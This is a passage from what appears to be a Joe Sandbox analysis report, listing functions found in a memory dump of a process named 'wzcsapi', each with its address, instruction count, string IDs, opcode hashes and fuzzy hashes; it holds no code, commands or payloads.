                                                                                                                                                                                                                                                • Opcode ID: 8ab3bb0529478a23dc0acfc1531a1fa2922f3951cef09163de1b6519bd23e5dd
                                                                                                                                                                                                                                                • Instruction ID: ec0c75cd3e7b26d83767e6b86912659036ee8889371821c1858aa4374d6ce824
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ab3bb0529478a23dc0acfc1531a1fa2922f3951cef09163de1b6519bd23e5dd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A712F607289068BF744B77CC45ABA9B2D6EFA8301F5445B6E40DC37E7CE2CAD428B51
                                                                                                                                                                                                                                                Function 00007FFAAC591291 Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: (0
                                                                                                                                                                                                                                                • API String ID: 0-2478120556
                                                                                                                                                                                                                                                • Opcode ID: f3a5473d4f8b2df65212c1dac941839cf94938998fbd02655469e5e8afe10faa
                                                                                                                                                                                                                                                • Instruction ID: 9c9453d405ec355c45ceb8050e2365a6e460e9abcb327bb29cad1edad645a4d5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f3a5473d4f8b2df65212c1dac941839cf94938998fbd02655469e5e8afe10faa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0512A71E0991A8FEB58DB68C8456F977F5FF99311F0441BAE04ED3192CE29AC0587C0
                                                                                                                                                                                                                                                Function 00007FFAAC591D30 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 8e
                                                                                                                                                                                                                                                • API String ID: 0-1620073548
                                                                                                                                                                                                                                                • Opcode ID: 6ffe2d1e35e59f6614da01bf87560531bc60b291d4531527d253797e1804f408
                                                                                                                                                                                                                                                • Instruction ID: eb9b4993278bd9125efa7099c97a058c6b026a4133f0126e431e6b0dca91c35e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ffe2d1e35e59f6614da01bf87560531bc60b291d4531527d253797e1804f408
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09512662B1D95A4FF798A73CD84AAB977CADF99210B0484F9E44EC3293DD1DEC424381
                                                                                                                                                                                                                                                Function 00007FFAAC592239 Relevance: 1.4, Strings: 1, Instructions: 163COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: r6
                                                                                                                                                                                                                                                • API String ID: 0-2984296541
                                                                                                                                                                                                                                                • Opcode ID: 9f04e8446f290fee0c35e30dca6e8e30680ea9beb2d208ab606755439729c64b
                                                                                                                                                                                                                                                • Instruction ID: 637f58e439be2e72f093148717e45e1709db780e121b3b0dbc1c537a7e36178c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f04e8446f290fee0c35e30dca6e8e30680ea9beb2d208ab606755439729c64b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19415A61B1D6894FE788AB3C98666797BD9DF9A211F0444FEF04EC36D3DD189C028381
                                                                                                                                                                                                                                                Function 00007FFAAC590909 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 8e
                                                                                                                                                                                                                                                • API String ID: 0-1620073548
                                                                                                                                                                                                                                                • Opcode ID: 3569f05798dcdbd79274b5523d5a0a6b1279f15faef9d6bb23743eab4e78186e
                                                                                                                                                                                                                                                • Instruction ID: 97a804203a4cbd803c120b809afa01c35e216648055c3f9d75aedc1b87561bc5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3569f05798dcdbd79274b5523d5a0a6b1279f15faef9d6bb23743eab4e78186e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 72414462A4EA474FF788A3B884565B86BD5EFDA210B4848FAE04DC71D3DD1DA84A4381
                                                                                                                                                                                                                                                Function 00007FFAAC591C70 Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: r6
                                                                                                                                                                                                                                                • API String ID: 0-2984296541
                                                                                                                                                                                                                                                • Opcode ID: a1abe6e60f99226ea6584c662e9206b1c036f9f021a2f0b73dce4230beffeddc
                                                                                                                                                                                                                                                • Instruction ID: b98e86ff549d872347101cc652f99bd076daf52c8aae5baadd9b8bbc87f9428e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1abe6e60f99226ea6584c662e9206b1c036f9f021a2f0b73dce4230beffeddc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3231B561B1C9490FEB98EB3CD85A679B7C6EB99311F0445BEE04EC36D3DD289C418381
                                                                                                                                                                                                                                                Function 00007FFAAC5924E9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 6
                                                                                                                                                                                                                                                • API String ID: 0-1452363761
                                                                                                                                                                                                                                                • Opcode ID: 0a74ddab92180e8c3fad88507ede3872d45205110adf705f2bb9dd5d352138bb
                                                                                                                                                                                                                                                • Instruction ID: 9878985c8790b0773e2ae72c752296d94bdf895a26ea13987f7110ccb595e9b6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a74ddab92180e8c3fad88507ede3872d45205110adf705f2bb9dd5d352138bb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5531D461A1890A8FFB44BBBC886A7BD77D5EF98300F0481BAE40DC7297DD2C98458791
                                                                                                                                                                                                                                                Function 00007FFAAC5923A1 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: HB
                                                                                                                                                                                                                                                • API String ID: 0-408134297
                                                                                                                                                                                                                                                • Opcode ID: 7aa500bf5e62c3a511cd7cec5d74199bddea2011369c6c0e0219858edab618ac
                                                                                                                                                                                                                                                • Instruction ID: 486a8decd6f5926c5f8f5567aab0e202846d8f39d24af10f1c6bbbd6a0db3781
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7aa500bf5e62c3a511cd7cec5d74199bddea2011369c6c0e0219858edab618ac
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D241E471918A4A9FEB44EB78C851AF97BE1FF89300F508475D00DC32D2CE28A945CB80
                                                                                                                                                                                                                                                Function 00007FFAAC592500 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 6
                                                                                                                                                                                                                                                • API String ID: 0-1452363761
                                                                                                                                                                                                                                                • Opcode ID: 836385f5caae787aa715e275af0b0d48254e9c1553ee9f8cace78caac3959a05
                                                                                                                                                                                                                                                • Instruction ID: 269598744b8fe1c9c7a9abf7c62b34b544fcdb44b1d37fbdc039b154bfe14a72
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 836385f5caae787aa715e275af0b0d48254e9c1553ee9f8cace78caac3959a05
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F731A761B1890A4BEB84BBBC885A7BD76D6EF9C301F5041B9E40DC3297DD289C458791
                                                                                                                                                                                                                                                Function 00007FFAAC5998FD Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 0-2564639436
                                                                                                                                                                                                                                                • Opcode ID: 7c2a9d63e0efa2a27d0d5a0965b7c17fcdcd8ba71824d433b305cef32214cccc
                                                                                                                                                                                                                                                • Instruction ID: f22365d119d3d44549171b512da85a382ceae081b67176a0b9aeee02ed3aca17
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c2a9d63e0efa2a27d0d5a0965b7c17fcdcd8ba71824d433b305cef32214cccc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6521D532C4E25B8FFB409BA4C8556EDBBE4EF47310F0541BAE48DD3192DA2E944987D2
                                                                                                                                                                                                                                                Function 00007FFAAC594700 Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 0-2564639436
                                                                                                                                                                                                                                                • Opcode ID: d2be783dda2a79105dbd6082b8619a572504a58d13c8bb459116791bef0f99b6
                                                                                                                                                                                                                                                • Instruction ID: a766e0f3650a3717e2b545ec525170f7456938bb372380998afc494804af1dad
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2be783dda2a79105dbd6082b8619a572504a58d13c8bb459116791bef0f99b6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA11A531D5951B8AFF54AB6884056FDB6A8EF86304F00407AE91DE2180DE2FA94486D2
                                                                                                                                                                                                                                                Function 00007FFAAC593BBA Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: HB
                                                                                                                                                                                                                                                • API String ID: 0-408134297
                                                                                                                                                                                                                                                • Opcode ID: ac22f9b7059042a5afff9c1066a4994699ebc20a8da9cc816db2e4358a3e7455
                                                                                                                                                                                                                                                • Instruction ID: be873666e8129c8dc12ff044aa3e4e8973de131a0bcca4d930ec8d1ef241844c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac22f9b7059042a5afff9c1066a4994699ebc20a8da9cc816db2e4358a3e7455
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9501C051E8E687CFF766637CC4662692A99EF67304F0084FAE04D822C3DD1DA80A8381
                                                                                                                                                                                                                                                Function 00007FFAAC594A85 Relevance: 1.3, Strings: 1, Instructions: 5COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 6
                                                                                                                                                                                                                                                • API String ID: 0-1452363761
                                                                                                                                                                                                                                                • Opcode ID: 6e553e47e870b42a757cb55e513459a4906b23a8f78636867ebca816f799a9de
                                                                                                                                                                                                                                                • Instruction ID: bc990022c209be84a4168d6acf4497006e48c2fa956539c8f1dea3638ffedf71
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e553e47e870b42a757cb55e513459a4906b23a8f78636867ebca816f799a9de
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01A0029274D2815AE303013DDC311AD2E114FC625871B00B3D8D886992D85C59169111
                                                                                                                                                                                                                                                Function 00007FFAAC599BB0 Relevance: .5, Instructions: 493COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: b024923813f5763409aca065283e968a13d0051693dc6090529a4b9921d90326
                                                                                                                                                                                                                                                • Instruction ID: 0083c1e84cb763baf7e89f7491fad4bf4755ab14264281747ff6ef9bd42647bf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b024923813f5763409aca065283e968a13d0051693dc6090529a4b9921d90326
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F561E47191CA4D8FEB54DB68C855AEDBBF1FF59301F1482AAD04DD3292CE38A845CB81
                                                                                                                                                                                                                                                Function 00007FFAAC59A300 Relevance: .2, Instructions: 208COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 362c49c2bd5037a1ee62954cfa059035c7b50ba6ae71ab8d0541d8e8808fae8b
                                                                                                                                                                                                                                                • Instruction ID: ee44ffddf82272d62ca5eb31d4bea0c8de0b1631d0ba3b3f9f4ecdb10cf9a86c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 362c49c2bd5037a1ee62954cfa059035c7b50ba6ae71ab8d0541d8e8808fae8b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3651B631A1891D8FEB98EB7CC499AB977E5EF59310F0445B9E00ED32D2CE29EC458781
                                                                                                                                                                                                                                                Function 00007FFAAC590A81 Relevance: .2, Instructions: 203COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5c209434fbdd6492deaf01e9f96cb0dbe05a7d1f64491fb5b270d2edd735e9de
                                                                                                                                                                                                                                                • Instruction ID: 764d171fd82f7263c1537f7f5fa002cef230f4679eb6be1064a3b87efcd111da
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c209434fbdd6492deaf01e9f96cb0dbe05a7d1f64491fb5b270d2edd735e9de
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF517161B1890A8FEB84F768D452BB9B3D6EF98300F5445B5E00EC33D7CE2CA9458B91
                                                                                                                                                                                                                                                Function 00007FFAAC59A80A Relevance: .2, Instructions: 199COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9c2be6c6f596c9bf9972a248ef7bf327ae7d1487343349c0ddd143dcf21a8f22
                                                                                                                                                                                                                                                • Instruction ID: fa561679d5c6e26464e74a7e9d21aa73368e6ada7de9f5456c05b97953a0e067
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c2be6c6f596c9bf9972a248ef7bf327ae7d1487343349c0ddd143dcf21a8f22
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A15124719486498FE749DB68C845AB87BE4EF56310F0481BAD00DD3292CB29E44BCB90
                                                                                                                                                                                                                                                Function 00007FFAAC595AAC Relevance: .2, Instructions: 196COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 101cc9941e3baae0cf0b5f278c88e421acdafcf172c77a54839f4ff40752e6f3
                                                                                                                                                                                                                                                • Instruction ID: eb051cc688a7b14932241ebde6972da009ce40f1302c21b23b23fd77ccc452c7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 101cc9941e3baae0cf0b5f278c88e421acdafcf172c77a54839f4ff40752e6f3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F517F71908A4C8FDB68DB68D845BE9BBB1FB59310F0082AAD44DD3252DE34A9858FC1
                                                                                                                                                                                                                                                Function 00007FFAAC5934B8 Relevance: .2, Instructions: 177COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 57fc9c82cf8aa6ddf37ed30388540ba0a7431983603ccadfdff6094136799e95
                                                                                                                                                                                                                                                • Instruction ID: 5c19987c7869029b6cf13417fcb9dc1c07d14551d384754e5fdad289e2ecbec6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57fc9c82cf8aa6ddf37ed30388540ba0a7431983603ccadfdff6094136799e95
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8519670E5891E8FEB98EB28D445ABC73E6FF99300F4084B5E00DD3292DF29E8458780
                                                                                                                                                                                                                                                Function 00007FFAAC59A019 Relevance: .2, Instructions: 175COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 513916363e70544a29985874f9ae426862b2f901237aadbff87c15e994434549
                                                                                                                                                                                                                                                • Instruction ID: 52242a9890fc4f3f5302cc016cfa1178fac8ef7fd78eb2b6b5660de32e5d20fa
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 513916363e70544a29985874f9ae426862b2f901237aadbff87c15e994434549
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8151E331A5D94A8FEB54EB28D855AAC77E5EF4A300F0441F9E00DD32D2DF2DE8458790
                                                                                                                                                                                                                                                Function 00007FFAAC593C45 Relevance: .2, Instructions: 150COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5f6d0916e811a6c40e5652c23b01208ef21b3dba8fae798682a148fa15e845f7
                                                                                                                                                                                                                                                • Instruction ID: 3e2ed530b8ca476ebfd0376a897d26990fe20235ddf5942b1a4bd9bced974b59
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f6d0916e811a6c40e5652c23b01208ef21b3dba8fae798682a148fa15e845f7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32418070949A1DCFEB99EB68C45AAA977E0FF65311F0041BEE00EC3692CB35D845CB41
                                                                                                                                                                                                                                                Function 00007FFAAC5934E0 Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6f9398318df8852fe7e9346c8e98ab6c29687fbc4cf07dc184fd015feaae636a
                                                                                                                                                                                                                                                • Instruction ID: 91879230e8a99d8ab3b92dd8866c06bbfb785ffbbd2b1e0ea27ad9f1c05fd919
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f9398318df8852fe7e9346c8e98ab6c29687fbc4cf07dc184fd015feaae636a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26418D70949A1DCFEB99EB6CC45AAA977E0FB65301F00417EE00ED3691CB35E8458B81
                                                                                                                                                                                                                                                Function 00007FFAAC5907CD Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f6c5e94d2f490dd67d23082649e66dcfa300decbd515c881492d12ab2fcea82e
                                                                                                                                                                                                                                                • Instruction ID: 263364e34c77e92a6282c376cb08ee1ecf895edb052e7c4a7fe1948e0442c714
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6c5e94d2f490dd67d23082649e66dcfa300decbd515c881492d12ab2fcea82e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 984118A2A4E6C3CBF745A7B448554A87FD4FF9721075888FAE08D86183ED1ED90D83C1
                                                                                                                                                                                                                                                Function 00007FFAAC5907FD Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
